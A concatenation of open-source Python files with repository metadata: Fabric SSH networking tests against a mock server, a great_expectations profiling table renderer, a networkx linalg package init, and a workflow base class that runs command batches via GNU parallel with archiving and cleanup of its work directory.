"path": "tools/json_schema_compiler/namespace_resolver.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from __future__ import with_statement
import sys
import paramiko
from fudge import Fake, patch_object, with_fakes
from fabric.context_managers import settings, hide, show
from fabric.network import (HostConnectionCache, join_host_strings, normalize,
denormalize)
import fabric.network # So I can call patch_object correctly. Sigh.
from fabric.state import env, output, _get_system_username
from fabric.operations import run, sudo
from utils import *
from server import (server, PORT, RESPONSES, PASSWORDS, CLIENT_PRIVKEY, USER,
CLIENT_PRIVKEY_PASSPHRASE)
#
# Subroutines, e.g. host string normalization
#
class TestNetwork(FabricTest):
def test_host_string_normalization(self):
username = _get_system_username()
for description, input, output_ in (
("Sanity check: equal strings remain equal",
'localhost', 'localhost'),
("Empty username is same as get_system_username",
'localhost', username + '@localhost'),
("Empty port is same as port 22",
'localhost', 'localhost:22'),
("Both username and port tested at once, for kicks",
'localhost', username + '@localhost:22'),
):
eq_.description = "Host-string normalization: %s" % description
yield eq_, normalize(input), normalize(output_)
del eq_.description
def test_normalization_without_port(self):
"""
normalize() and join_host_strings() omit port if omit_port given
"""
eq_(
join_host_strings(*normalize('user@localhost', omit_port=True)),
'user@localhost'
)
def test_nonword_character_in_username(self):
"""
normalize() will accept non-word characters in the username part
"""
eq_(
normalize('user-with-hyphens@someserver.org')[0],
'user-with-hyphens'
)
def test_normalization_of_empty_input(self):
empties = ('', '', '')
for description, input in (
("empty string", ''),
("None", None)
):
template = "normalize() returns empty strings for %s input"
eq_.description = template % description
yield eq_, normalize(input), empties
del eq_.description
def test_host_string_denormalization(self):
username = _get_system_username()
for description, string1, string2 in (
("Sanity check: equal strings remain equal",
'localhost', 'localhost'),
("Empty username is same as get_system_username",
'localhost:22', username + '@localhost:22'),
("Empty port is same as port 22",
'user@localhost', 'user@localhost:22'),
("Both username and port",
'localhost', username + '@localhost:22'),
):
eq_.description = "Host-string denormalization: %s" % description
yield eq_, denormalize(string1), denormalize(string2)
del eq_.description
#
# Connection caching
#
@staticmethod
@with_fakes
def check_connection_calls(host_strings, num_calls):
# Clear Fudge call stack
# Patch connect() with Fake obj set to expect num_calls calls
patched_connect = patch_object('fabric.network', 'connect',
Fake('connect', expect_call=True).times_called(num_calls)
)
try:
# Make new cache object
cache = HostConnectionCache()
# Connect to all connection strings
for host_string in host_strings:
# Obtain connection from cache, potentially calling connect()
cache[host_string]
finally:
# Restore connect()
patched_connect.restore()
def test_connection_caching(self):
for description, host_strings, num_calls in (
("Two different host names, two connections",
('localhost', 'other-system'), 2),
("Same host twice, one connection",
('localhost', 'localhost'), 1),
("Same host twice, different ports, two connections",
('localhost:22', 'localhost:222'), 2),
("Same host twice, different users, two connections",
('user1@localhost', 'user2@localhost'), 2),
):
TestNetwork.check_connection_calls.description = description
yield TestNetwork.check_connection_calls, host_strings, num_calls
#
# Connection loop flow
#
@server()
def test_saved_authentication_returns_client_object(self):
cache = HostConnectionCache()
assert isinstance(cache[env.host_string], paramiko.SSHClient)
@server()
@with_fakes
def test_prompts_for_password_without_good_authentication(self):
env.password = None
with password_response(PASSWORDS[env.user], times_called=1):
cache = HostConnectionCache()
cache[env.host_string]
@mock_streams('stdout')
@server()
def test_trailing_newline_line_drop(self):
"""
Trailing newlines shouldn't cause last line to be dropped.
"""
# Multiline output with trailing newline
cmd = "ls /"
output_string = RESPONSES[cmd]
# TODO: fix below lines, duplicates inner workings of tested code
prefix = "[%s] out: " % env.host_string
expected = prefix + ('\n' + prefix).join(output_string.split('\n'))
# Create, tie off thread
with settings(show('everything'), hide('running')):
result = run(cmd)
# Test equivalence of expected, received output
eq_(expected, sys.stdout.getvalue())
# Also test that the captured value matches, too.
eq_(output_string, result)
@server()
def test_sudo_prompt_kills_capturing(self):
"""
Sudo prompts shouldn't screw up output capturing
"""
cmd = "ls /simple"
with hide('everything'):
eq_(sudo(cmd), RESPONSES[cmd])
@server()
def test_password_memory_on_user_switch(self):
"""
Switching users mid-session should not screw up password memory
"""
def _to_user(user):
return join_host_strings(user, env.host, env.port)
user1 = 'root'
user2 = USER
with settings(hide('everything'), password=None):
# Connect as user1 (thus populating both the fallback and
# user-specific caches)
with settings(
password_response(PASSWORDS[user1]),
host_string=_to_user(user1)
):
run("ls /simple")
# Connect as user2: * First cxn attempt will use fallback cache,
# which contains user1's password, and thus fail * Second cxn
# attempt will prompt user, and succeed due to mocked p4p * but
# will NOT overwrite fallback cache
with settings(
password_response(PASSWORDS[user2]),
host_string=_to_user(user2)
):
# Just to trigger connection
run("ls /simple")
# * Sudo call should use cached user2 password, NOT fallback cache,
# and thus succeed. (I.e. p_f_p should NOT be called here.)
with settings(
password_response('whatever', times_called=0),
host_string=_to_user(user2)
):
sudo("ls /simple")
@mock_streams('stderr')
@server()
def test_password_prompt_displays_host_string(self):
"""
Password prompt lines should include the user/host in question
"""
env.password = None
env.no_agent = env.no_keys = True
output.everything = False
with password_response(PASSWORDS[env.user], silent=False):
run("ls /simple")
regex = r'^\[%s\] Login password for user %(user)s:' % (env.host_string, env.user)
assert_contains(regex, sys.stderr.getvalue())
@mock_streams('stderr')
@server(pubkeys=True)
def test_passphrase_prompt_displays_host_and_user_string(self):
"""
Passphrase prompt lines should include the host/usr in question
"""
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
output.everything = False
with password_response(CLIENT_PRIVKEY_PASSPHRASE, silent=False):
run("ls /simple")
regex = r'^\[%s\] Login password for user %(user)s:' % (env.host_string, env.user)
assert_contains(regex, sys.stderr.getvalue())
@mock_streams('stderr')
@server(pubkeys=True)
def test_passphrase_prompt_does_not_display_username_when_user_not_present(self):
"""
Passphrase prompt lines should not include the username when not set
"""
env.password = None
env.user = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
output.everything = False
with password_response(CLIENT_PRIVKEY_PASSPHRASE, silent=False):
run("ls /simple")
regex = r'^\[%s\] Login password: ' % env.host_string
assert_contains(regex, sys.stderr.getvalue())
def test_sudo_prompt_display_passthrough(self):
"""
Sudo prompt should display (via passthrough) when stdout/stderr shown
"""
TestNetwork._prompt_display(True)
def test_sudo_prompt_display_directly(self):
"""
Sudo prompt should display (manually) when stdout/stderr hidden
"""
TestNetwork._prompt_display(False)
@staticmethod
@mock_streams('both')
@server(pubkeys=True, responses={'oneliner': 'result'})
def _prompt_display(display_output):
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
output.output = display_output
with password_response(
(CLIENT_PRIVKEY_PASSPHRASE, PASSWORDS[env.user]),
silent=False
):
sudo('oneliner')
if display_output:
expected = """
[%(prefix)s] sudo: oneliner
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: sudo password:
[%(prefix)s] out: Sorry, try again.
[%(prefix)s] out: sudo password:
[%(prefix)s] out: result
""" % {'prefix': env.host_string, 'user': env.user}
else:
# Note lack of first sudo prompt (as it's autoresponded to) and of
# course the actual result output.
expected = """
[%(prefix)s] sudo: oneliner
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: Sorry, try again.
[%(prefix)s] out: sudo password: """ % {'prefix': env.host_string,
'user': env.user}
eq_(expected[1:], sys.stdall.getvalue())
@mock_streams('both')
@server(
pubkeys=True,
responses={'oneliner': 'result', 'twoliner': 'result1\nresult2'}
)
def test_consecutive_sudos_should_not_have_blank_line(self):
"""
Consecutive sudo() calls should not incur a blank line in-between
"""
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
with password_response(
(CLIENT_PRIVKEY_PASSPHRASE, PASSWORDS[USER]),
silent=False
):
sudo('oneliner')
sudo('twoliner')
expected = """
[%(prefix)s] sudo: oneliner
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: sudo password:
[%(prefix)s] out: Sorry, try again.
[%(prefix)s] out: sudo password:
[%(prefix)s] out: result
[%(prefix)s] sudo: twoliner
[%(prefix)s] out: sudo password:
[%(prefix)s] out: result1
[%(prefix)s] out: result2
""" % {'prefix': env.host_string, 'user': env.user}
eq_(expected[1:], sys.stdall.getvalue())
@mock_streams('both')
@server(pubkeys=True, responses={'silent': '', 'normal': 'foo'})
def test_silent_commands_should_not_have_blank_line(self):
"""
Silent commands should not generate an extra trailing blank line
After the move to interactive I/O, it was noticed that while run/sudo
commands which had non-empty stdout worked normally (consecutive such
commands were totally adjacent), those with no stdout (i.e. silent
commands like ``test`` or ``mkdir``) resulted in spurious blank lines
after the "run:" line. This looks quite ugly in real world scripts.
"""
env.password = None
env.no_agent = env.no_keys = True
env.key_filename = CLIENT_PRIVKEY
with password_response(CLIENT_PRIVKEY_PASSPHRASE, silent=False):
run('normal')
run('silent')
run('normal')
with hide('everything'):
run('normal')
run('silent')
expected = """
[%(prefix)s] run: normal
[%(prefix)s] Login password for user %(user)s:
[%(prefix)s] out: foo
[%(prefix)s] run: silent
[%(prefix)s] run: normal
[%(prefix)s] out: foo
""" % {'prefix': env.host_string, 'user': env.user}
eq_(expected[1:], sys.stdall.getvalue())
|
{
"content_hash": "fcb1528974448c5345873b75fc054536",
"timestamp": "",
"source": "github",
"line_count": 372,
"max_line_length": 90,
"avg_line_length": 35.79838709677419,
"alnum_prop": 0.5878200795975069,
"repo_name": "rsteckroth/TavFabric",
"id": "38addcea3ba17715944e383ecc1f3324fdc62c72",
"size": "13317",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_network.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "246989"
}
],
"symlink_target": ""
}
|
from great_expectations.expectations.registry import get_renderer_impl
from great_expectations.render import (
LegacyDescriptiveRendererType,
RenderedTableContent,
)
from great_expectations.render.renderer.content_block.content_block import (
ContentBlockRenderer,
)
class ProfilingColumnPropertiesTableContentBlockRenderer(ContentBlockRenderer):
expectation_renderers = {
"expect_column_values_to_not_match_regex": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_REGEX_COUNT_ROW
],
"expect_column_unique_value_count_to_be_between": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_DISTINCT_COUNT_ROW
],
"expect_column_proportion_of_unique_values_to_be_between": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_DISTINCT_PERCENT_ROW
],
"expect_column_values_to_not_be_null": [
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_MISSING_COUNT_ROW,
LegacyDescriptiveRendererType.COLUMN_PROPERTIES_TABLE_MISSING_PERCENT_ROW,
],
}
@classmethod
def render(cls, ge_object, header_row=None):
"""Each expectation method should return a list of rows"""
if header_row is None:
header_row = []
table_rows = []
if isinstance(ge_object, list):
for sub_object in ge_object:
expectation_type = cls._get_expectation_type(sub_object)
if expectation_type in cls.expectation_renderers:
new_rows = [
get_renderer_impl(expectation_type, renderer_type)[1](
result=sub_object
)
for renderer_type in cls.expectation_renderers.get(
expectation_type
)
]
table_rows.extend(new_rows)
else:
expectation_type = cls._get_expectation_type(ge_object)
if expectation_type in cls.expectation_renderers:
new_rows = [
get_renderer_impl(expectation_type, renderer_type)[1](
result=ge_object
)
for renderer_type in cls.expectation_renderers.get(expectation_type)
]
table_rows.extend(new_rows)
return RenderedTableContent(
**{
"content_block_type": "table",
"header_row": header_row,
"table": table_rows,
}
)
|
{
"content_hash": "03f5774bf6b4e0fdbccda19879ab8e97",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 88,
"avg_line_length": 39.45454545454545,
"alnum_prop": 0.5817972350230415,
"repo_name": "great-expectations/great_expectations",
"id": "590b4f9f0c735a71483fb3bc8deb7d8269a1fa25",
"size": "2604",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "great_expectations/render/renderer/content_block/profiling_column_properties_table_content_block.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "23771"
},
{
"name": "Dockerfile",
"bytes": "2388"
},
{
"name": "HTML",
"bytes": "27311"
},
{
"name": "JavaScript",
"bytes": "45960"
},
{
"name": "Jinja",
"bytes": "66650"
},
{
"name": "Jupyter Notebook",
"bytes": "816323"
},
{
"name": "Lua",
"bytes": "3489"
},
{
"name": "Makefile",
"bytes": "657"
},
{
"name": "Python",
"bytes": "15728777"
},
{
"name": "Shell",
"bytes": "2930"
}
],
"symlink_target": ""
}
|
from networkx.linalg.attrmatrix import *
import networkx.linalg.attrmatrix
from networkx.linalg.spectrum import *
import networkx.linalg.spectrum
from networkx.linalg.graphmatrix import *
import networkx.linalg.graphmatrix
from networkx.linalg.laplacianmatrix import *
import networkx.linalg.laplacianmatrix
from networkx.linalg.algebraicconnectivity import *
from networkx.linalg.modularitymatrix import *
import networkx.linalg.modularitymatrix
from networkx.linalg.bethehessianmatrix import *
import networkx.linalg.bethehessianmatrix
|
{
"content_hash": "f1a08dfe09839f90ca3f6113bddc9301",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 51,
"avg_line_length": 41.38461538461539,
"alnum_prop": 0.8643122676579925,
"repo_name": "sserrot/champion_relationships",
"id": "f09b4023b75ad0d60264270438ee61daf4054a37",
"size": "538",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "venv/Lib/site-packages/networkx/linalg/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "128"
},
{
"name": "HTML",
"bytes": "18324224"
},
{
"name": "Jupyter Notebook",
"bytes": "9131072"
},
{
"name": "Python",
"bytes": "10702"
}
],
"symlink_target": ""
}
|
import sys, os
import subprocess as sub
import multiprocessing
import time
import datetime
import logging
from optparse import OptionParser, OptionGroup
import pos_common
import pos_wrappers
class generic_workflow(object):
"""
A generic command-line workflow class. Workflow should be understood as a
configurable pipeline with a configurable execution settings.
The workflow / pipeline may consist of different stages use a numbser of
different files, etc. The reason for this class is to use command line tools
which functionality cannot be achieved in any other way.
>>> options, args = generic_workflow.parseArgs()
>>> options.dryRun = True
>>> w = generic_workflow(options, args) #doctest: +ELLIPSIS
Executing: mkdir -p /dev/shm/generic_workflow_...
<BLANKLINE>
<BLANKLINE>
>>> w.execute(["some command", "another command"])
some command
another command
>>> w.execute(["a batch comprising only one command"])
a batch comprising only one command
>>> w.execute("Bad_usage")
B
a
d
_
u
s
a
g
e
You have to provide some argument, at least one
>>> w.execute()
Traceback (most recent call last):
TypeError: execute() takes at least 2 arguments (1 given)
All arguments are mapped to strings
>>> w.execute(1)
1
>>> w.execute([1, 2.3, False, None])
1
2.3
False
None
# Now let's test the ability of the workflow to compress its own
# workflow directory.
>>> w.options.archiveWorkDir = "/some/directory/to/archive/stuff/"
>>> w._archive_workflow() #doctest: +ELLIPSIS
tar -cvvzf /some/directory/to/archive/stuff/generic_workflow_...tgz /dev/shm/generic_workflow_...
# Ok, let's remove the existing workflow object and create a new one with
# slightly more settings. First of all, these settings cause the workflow
# to use the local /tmp/ directory instead or the shared RAM memoru of the
# system. Note that this is still machine-local directory and is not
# shared between different execution nodes. This only replaces the
# /dev/shm/ with the /tmp/ directory and that's it.
# The next change is that the dry run option is actually turned on so the
# commands will be actually executed not only printed. This may cause a lot
# of mess - but hey - that's what you call testing!
>>> options, args = generic_workflow.parseArgs()
>>> options.disableSharedMemory = True
>>> options.dryRun = False
>>> options.cleanup = True
>>> options.archiveWorkDir = "/tmp/"
>>> w = generic_workflow(options, args) #doctest: +ELLIPSIS
Executing: mkdir -p /tmp/generic_workflow_...
<BLANKLINE>
<BLANKLINE>
# To test out the execution routines one has to actually execute some
# commands therefore below we execute a command which does not produce any
# output.
>>> w.execute(["sleep 1"]) == ('', '')
True
# Now we test archiving and cleanup routines by manually executing a pre
# and postlaunch methods. In the meanwhile we want to test the archiving
# feature as well
>>> w._pre_launch()
>>> w._post_launch() #doctest: +ELLIPSIS
Executing: tar -cvvzf /tmp/generic_workflow_....tgz /tmp/generic_workflow_...
...
Executing: rm -rfv /tmp/generic_workflow_...
removed `/tmp/generic_workflow_...'
removed directory: `/tmp/generic_workflow_...'
<BLANKLINE>
"""
# Define the name for GNU parallel executeble name.
__PARALLEL_EXECUTABLE_NAME="parallel"
# _f is a dictionary holding definitions of files beeing a part of the
# workflow. The purpose of this dictionary is to be able to easily access
# and utilize filenames (from each stage of the workflow). You're gonna like
# it.
_f = {}
# Override this attribute in the inherited classes.
_usage = ""
# Just to avoid hadcoded strings further
_DO_NOT_CREATE_WORKDIR = 'skip'
def __init__(self, options, args):
"""
:param optionsDict: Command line options
:type optionsDict: dict
:param args: Command line arguments
:type args: list
"""
self.options = options
self.args = args
# Just an alias that assigns private attribute as a public. May be
# changed in the future.
self.f = dict(self._f)
# Get number of cpus for parallel processing.
# Multiprocessing modlue is used to determine the number of cpus. This
# behavior can be overriden with --cpuNo switch.
if not self.options.cpuNo:
self.options.cpuNo = multiprocessing.cpu_count()
self._initializeLogging()
self._initializeOptions()
self._validate_options()
self._initializeDirectories()
self._overrideDefaults()
def _initializeLogging(self):
"""
Seems to be self explaining - initialized the logging module using
either ethe default logging settings or customized logging settings
according to provided command line paramteres.
"""
pos_common.setup_logging(self.options.logFilename,
self.options.loglevel)
logging.debug("Logging module initialized. Saving to: %s, Loglevel: %s",
self.options.logFilename, self.options.loglevel)
# Assign the the string that will identify all messages from this
# script
self._logger = logging.getLogger(self.__class__.__name__)
self._logger.info("%s workflow options:", self.__class__.__name__)
for k, v in self.options.__dict__.items():
self._logger.info("%s : %s", k, v)
def _initializeOptions(self):
"""
There is not many to process or initialize. Actually only jobID (if not
provided) is processed automatically.
"""
# What the heck is a "specimen ID"? It is supposed to be at least single
# value which will allow to assign an instance of the workflow to
# particual animal. When you have multiple animals they can get confused
# easily. In the future, specimen ID, will act as database ID for given
# specimen. Thus, it is hardcoded to not allow any computations without
# this ID. Simple as it is.
# We need to check if the GNU parallel of availeble. If it's not, we
# cannot perform parallel computations.
if not pos_common.which(self.__PARALLEL_EXECUTABLE_NAME) and\
self.options.cpuNo > 1:
self._logger.error("Parallel execution was selected but GNU parallel is not available!")
sys.exit(1)
# Job ID is another value for accointing and managing. Oppoosite to the
# specimen ID, this one may not be explicitly stated. In that case, it
# is generated automatically based on current data and PID.
if self.options.jobId is None:
self.options.jobId = self.__class__.__name__
self.options.jobId += datetime.datetime.now().strftime("_%Y-%m-%d-%H_%M-%S_")
self.options.jobId += str(os.getpid())
def _overrideDefaults(self):
"""
A generic function for altering configuration that was set with
default values. Should be reimplemented in subclasses.
"""
pass
def _validate_options(self):
"""
A generic command line options validation function. Should be customized
in subclasses. A lot of assertions is expected to be here!
"""
pass
def _initializeDirectories(self):
"""
"""
# The directiories in the dictionary below are the potential working
# dirs for the workflow. The 'sharedbf' is used when given mashine
# has a ramdisk, otherwise 'tempbf'. These are the default locations for
# the workdir. Typically, the working directory location is a custom
# one.
_dirTemplates = {
'sharedbf': '/dev/shm/',
'tempbf' : '/tmp/'}
# Sometimes we just don't want create any work_dir (e.g. out workflow
# is done without creating any files. When 'workdir' command line
# parameter is set to skip, we just skip it. Anything that happens
# afterwards is a liability of the develeoper.
if self.options.workdir == self._DO_NOT_CREATE_WORKDIR:
return
# That's clever idea: When one don't want (or cannot) use shared memory
# on given mashine, the regular /tmp/ directory is used to support the
# computations. The tmp directory can be also set manually to, e.g.,
# directory shared among whole computer cluster.
if self.options.disableSharedMemory:
top_directory = _dirTemplates['tempbf']
else:
top_directory = _dirTemplates['sharedbf']
# If the working directory (the directory holding all the
# job's calculations) is not defined, we define it automatically
# When the working directory name IS provided we just use it.
if not self.options.workdir:
self.options.workdir =\
os.path.join(top_directory, self.options.jobId)
self._ensureDir(self.options.workdir)
# Assign path to work dir to all templates:
for k, v in self.f.iteritems():
v.job_dir = self.options.workdir
# And, as a last point, just create the directories.
dirs_to_create = list(set(map(lambda v: v.base_dir, self.f.itervalues())))
map(self._ensureDir, dirs_to_create)
def _ensureDir(self, path):
"""
Makes sure that the given directory exists and is avalilable.
:param path: Location to be tested. Note that only directory names are
valid paths. Passing filenames will probably end badly...
:type path: str
"""
return pos_wrappers.mkdir_wrapper(dir_list=[path])()
def _rmdir(self, path):
"""
Removes given location. Watch out as the files and/or directories are
removed recursively and uninvertabely (as in `rm -rfv` command).
:param path: Location to be removed.
:type path: str
"""
return pos_wrappers.rmdir_wrapper(dir_list=[path])()
@staticmethod
def _basename(path, withExtension=False):
return pos_common.get_basename(path, withExtension)
def execute(self, commands, parallel=True):
"""
One of the most important methods in the whole class. Executes the
workflow. The execution can be launched in parallel mode, and / or in
the 'dry run' mode. With the latter, the commands to be executed are
actually only printed. The 'dry run' mode is selected / deselected
using command line workflow settings.
:param commands: The commands to be executed
:type commands: An interable (in case of multiple commands - the usual
case), a string in case of a singe command.
:param parallel: Enables execution in parallel mode
:type parallel: bool
"""
# (https://docs.loni.org/wiki/PBS_Job_Chains_and_Dependencies)
# http://librarian.phys.washington.edu/athena/index.php/Job_Submission_Tutorial#NEW:_PBS_Job_Dependencies_.28advanced.29
# http://beige.ucs.indiana.edu/I590/node45.html
# If single command is provided, it is supposed to be a string. Convert
# to list with a single element.
if not hasattr(commands, "__getitem__"):
commands = [commands]
# In the regular execution mode (no dry-run) the commands can be
# executed serially or parallelly. In the latter case, all the commands
# are dumped into a file and executed with the GNU parallel.
if not self.options.dryRun:
command_filename = \
os.path.join(self.options.workdir, str(time.time()))
open(command_filename, 'w').write("\n".join(map(str, commands)))
self._logger.info("Saving command file: %s", command_filename)
if parallel:
cluster_file = os.path.join(os.getenv("HOME"), '.pos_cluster')
if os.path.isfile(cluster_file):
command_str = 'parallel --sshloginfile %s -a %s -k -j %d --env PATH --env PYTHONPATH --env LD_LIBRARY_PATH --workdir %s' %\
(cluster_file, command_filename, self.options.cpuNo, os.getcwd())
else:
command_str = 'parallel -a %s -k -j %d' %\
(command_filename, self.options.cpuNo)
else:
command_str = 'bash -x %s' % command_filename
self._logger.debug("Executing: %s", command_str)
# Tested against execution of multiple commands
stdout, stderr = sub.Popen(command_str,
stdout=sub.PIPE, stderr=sub.PIPE,
shell=True, close_fds=True).communicate()
self._logger.debug("Last commands stdout: %s", stdout)
self._logger.debug("Last commands stderr: %s", stderr)
return stdout, stderr
else:
print "\n".join(map(str, commands))
def launch(self):
"""
The workflow execution routine. Has to be customized and documenten in
every subclass A stub of method. Raise NotImplementedError. Every
`lauch` method has to invoke _post_launch()`_pre_launch()` and
`_post_launch()` as they are required to run the workflow properly.
"""
raise NotImplementedError, "Virtual method executed."
def _pre_launch(self):
"""
A generic just-before-execution rutine. Should be customized in
subclasses.
"""
pass
def _post_launch(self):
"""
A generic pos-execution routine. Should be customized in subclasses. In
its most basic form, it provides archiving the workflow and removing
the job directory. If you want you can customize it so it will send you
a notification email!
"""
if self.options.archiveWorkDir:
self._archive_workflow()
if self.options.cleanup:
self._clean_up()
def _archive_workflow(self):
"""
This method archived the workdir of the current workflow. The archive
name taken from the JobDir option while the dir of the archive is
provided by the `archiveWorkDir` command line parameter.
There's nothing much more to tell about this method... well, watch out
as the archive may be really (by which I mean really big). Be prepared
for gigabytes.
"""
archive_filename = os.path.join(self.options.archiveWorkDir,
self.options.jobId)
self._logger.info("Archive basename: %s", \
generic_workflow._basename(archive_filename))
self._logger.info("Archiving the job directory to: %s",\
archive_filename)
compress_command = pos_wrappers.compress_wrapper(
archive_filename = archive_filename,
pathname = self.options.workdir)
# Well, sometimes you don't want to execute the archive command
# esspecially when not other command was executed.
if not self.options.dryRun:
compress_command()
else:
print compress_command
def _clean_up(self):
"""
Erases the job's working directory.
"""
self._logger.info("Removing job directory.")
self._rmdir(self.options.workdir)
@classmethod
def _getCommandLineParser(cls):
"""
"""
parser = OptionParser(usage=cls._usage)
workflowSettings = OptionGroup(parser, 'General workflow settings')
workflowSettings.add_option('--jobId', '-j', dest='jobId', type='str',
default=None, help='Job identifier. An optional value identyfying this particular workflow. If ommited, the jobId will be generated automatically.')
workflowSettings.add_option('--workDir', '-d', dest='workdir', type='str',
default=None, help='Sets the working directory of the process. Overrides the "--disableSharedMemory" switch.')
workflowSettings.add_option('--loglevel', dest='loglevel', type='str',
default='WARNING', help='Loglevel: CRITICAL | ERROR | WARNING | INFO | DEBUG')
workflowSettings.add_option('--logFilename', dest='logFilename',
default=None, action='store', type='str',
help='Sets dumping the execution log file instead stderr')
workflowSettings.add_option('--disableSharedMemory', default=False,
dest='disableSharedMemory', action='store_const', const=True,
help='Forces script to use hard drive to store the worklfow data instaed of using RAM disk.')
workflowSettings.add_option('--specimenId', default=None,
dest='specimenId', action='store', type='str',
help='Identifier of the specimen. Providing the ID is obligatory. Script will not run without providing specimen ID.')
workflowSettings.add_option('--dryRun', default=False,
action='store_const', const=True, dest='dryRun',
help='Prints the commands to stdout instead of executing them')
workflowSettings.add_option('--cpuNo', '-n', default=None,
type='int', dest='cpuNo',
help='Set a number of CPUs for parallel processing. If skipped, the number of CPUs will be automatically detected.')
workflowSettings.add_option('--archiveWorkDir',default=None,
type='str', dest='archiveWorkDir',
help='Compresses (.tgz) and moves workdir to a given directory')
workflowSettings.add_option('--cleanup', default=False,
dest='cleanup', action='store_const', const=True,
help='Remove the worklfow directory after calculations. Use when you are sure that the workflow will execute correctly.')
parser.add_option_group(workflowSettings)
return parser
@classmethod
def parseArgs(cls):
parser = cls._getCommandLineParser()
(options, args) = parser.parse_args()
return (options, args)
class output_volume_workflow(generic_workflow):
"""
This class is designed to support workflows providing volume as one of the
outputs. It handles additional command line parameters for defining the
origin, spacing, orientation, type, anatomical orientation and many many
other.
>>> options, args = output_volume_workflow.parseArgs()
>>> options.parallel = False
>>> w = output_volume_workflow(options, args) #doctest: +ELLIPSIS
Executing: mkdir -p /dev/shm/output_volume_workflow_...
<BLANKLINE>
<BLANKLINE>
>>> print w.execute(["sleep 1"], parallel=False)[0] == ''
True
>>> print w.execute(["sleep 1"], parallel=False)[1].strip() == "+ sleep 1"
True
"""
__output_vol_command_line_args_help = {}
__output_vol_command_line_args_help['outputVolumeOrigin'] =\
"""Set the origin of the image -- the center of the voxel (0,0,0) in the image.
Should be specified in millimeters. Default: 0,0,0."""
__output_vol_command_line_args_help['outputVolumeScalarType'] =\
"""Specifies the pixel type for the output image. Data type for output volume's
voxels. The allowed values are: char | uchar | short | ushort | int | uint |
float | double. The default type, unlike in Convert3d is char."""
__output_vol_command_line_args_help['outputVolumeSpacing'] =\
"""Sets the voxel spacing of the image. A vector of three positive values is
required (e.g. '0.5 0.5 0.5'). The spacing is assumed to be provided in
milimeters. The defaults spacing is 1x1x1mm."""
__output_vol_command_line_args_help['outputVolumeResample'] =\
"""Requests additional resampling of the output volume. The resampling is applied
_before_ settting the output spacing. The resampling settings are provided as
three positive float values corresponding to the resampling factor (e.g. 0.25
1.0 0.75). Watch out when combining this whith other parameters like setting
spacing. By default there is no resampling."""
__output_vol_command_line_args_help['outputVolumePermutationOrder'] =\
"""Apply axes permutation. Permutation has to be provided as sequence of 3
integers separated by space. Identity (0,1,2) permutation is a default one."""
__output_vol_command_line_args_help['outputVolumeOrientationCode'] =\
"""Set the orientation of the image using one of 48 canonical orientations. The
orientation describes the mapping from the voxel coordinate system (i,j,k) to
the physical coordinate system (x,y,z). In the voxel coordinate system, i runs
along columns of voxels, j runs along rows of voxels, and k runs along slices
of voxels. It is assumed (by the NIFTI convention) that the axes of the
physical coordinate system run as follows: x from (L)eft to (R)ight, y from
(P)osterior to (A)nterior, z from (I)nferior to (S)uperior. (the explanation
is copied from Convert3D documentation:
http://www.itksnap.org/pmwiki/pmwiki.php?n=Convert3D.Documentation)"""
__output_vol_command_line_args_help['setInterpolation'] =\
"""Specifies the interpolation method for resampling the output volume. Be default
the linear interpolation is set. The other allowed values are: NearestNeighbor
| Linear | Cubic | Sinc | Gaussian."""
__output_vol_command_line_args_help['setFlip'] =\
"""Select axes to flip. Selection has to be provided as sequence of three
numbers. E.g. \'0 0 1\' will flip the z axis."""
@classmethod
def _getCommandLineParser(cls):
parser = generic_workflow._getCommandLineParser()
outputVolumeSettings = \
OptionGroup(parser, 'Output volumes settings')
outputVolumeSettings.add_option('--outputVolumeOrigin', dest='outputVolumeOrigin',
default=[0.,0.,0.], action='store', type='float', nargs =3,
help=cls.__output_vol_command_line_args_help['outputVolumeOrigin'])
outputVolumeSettings.add_option('--outputVolumeScalarType', default='uchar',
type='choice', dest='outputVolumeScalarType',
choices=['char','uchar','short','ushort','int','uint','float','double'],
help=cls.__output_vol_command_line_args_help['outputVolumeScalarType'])
outputVolumeSettings.add_option('--outputVolumeSpacing', default=[1,1,1],
type='float', nargs=3, dest='outputVolumeSpacing',
help=cls.__output_vol_command_line_args_help['outputVolumeSpacing'])
outputVolumeSettings.add_option('--outputVolumeResample',
dest='outputVolumeResample', type='float', nargs=3, default=None,
help=cls.__output_vol_command_line_args_help['outputVolumeResample'])
outputVolumeSettings.add_option('--outputVolumePermutationOrder', default=[0,1,2],
type='int', nargs=3, dest='outputVolumePermutationOrder',
help=cls.__output_vol_command_line_args_help['outputVolumePermutationOrder'])
outputVolumeSettings.add_option('--outputVolumeOrientationCode',
dest='outputVolumeOrientationCode', type='str', default='RAS',
help=cls.__output_vol_command_line_args_help['outputVolumeOrientationCode'])
outputVolumeSettings.add_option('--setInterpolation',
dest='setInterpolation', type='str', default=None,
help=cls.__output_vol_command_line_args_help['setInterpolation'])
outputVolumeSettings.add_option('--setFlip',
dest='setFlip', type='str', default=None,
help=cls.__output_vol_command_line_args_help['setFlip'])
parser.add_option_group(outputVolumeSettings)
return parser
class enclosed_workflow(generic_workflow):
"""
A base for workflows not utilizing temporary direcotries.
This workflow is deditacted for pipelines that don't use
working directories and which do not store temponary data aduring processing.
It has disabled some features regarding jobdirs, parallel execution,
cleaning up the working directories, etc.
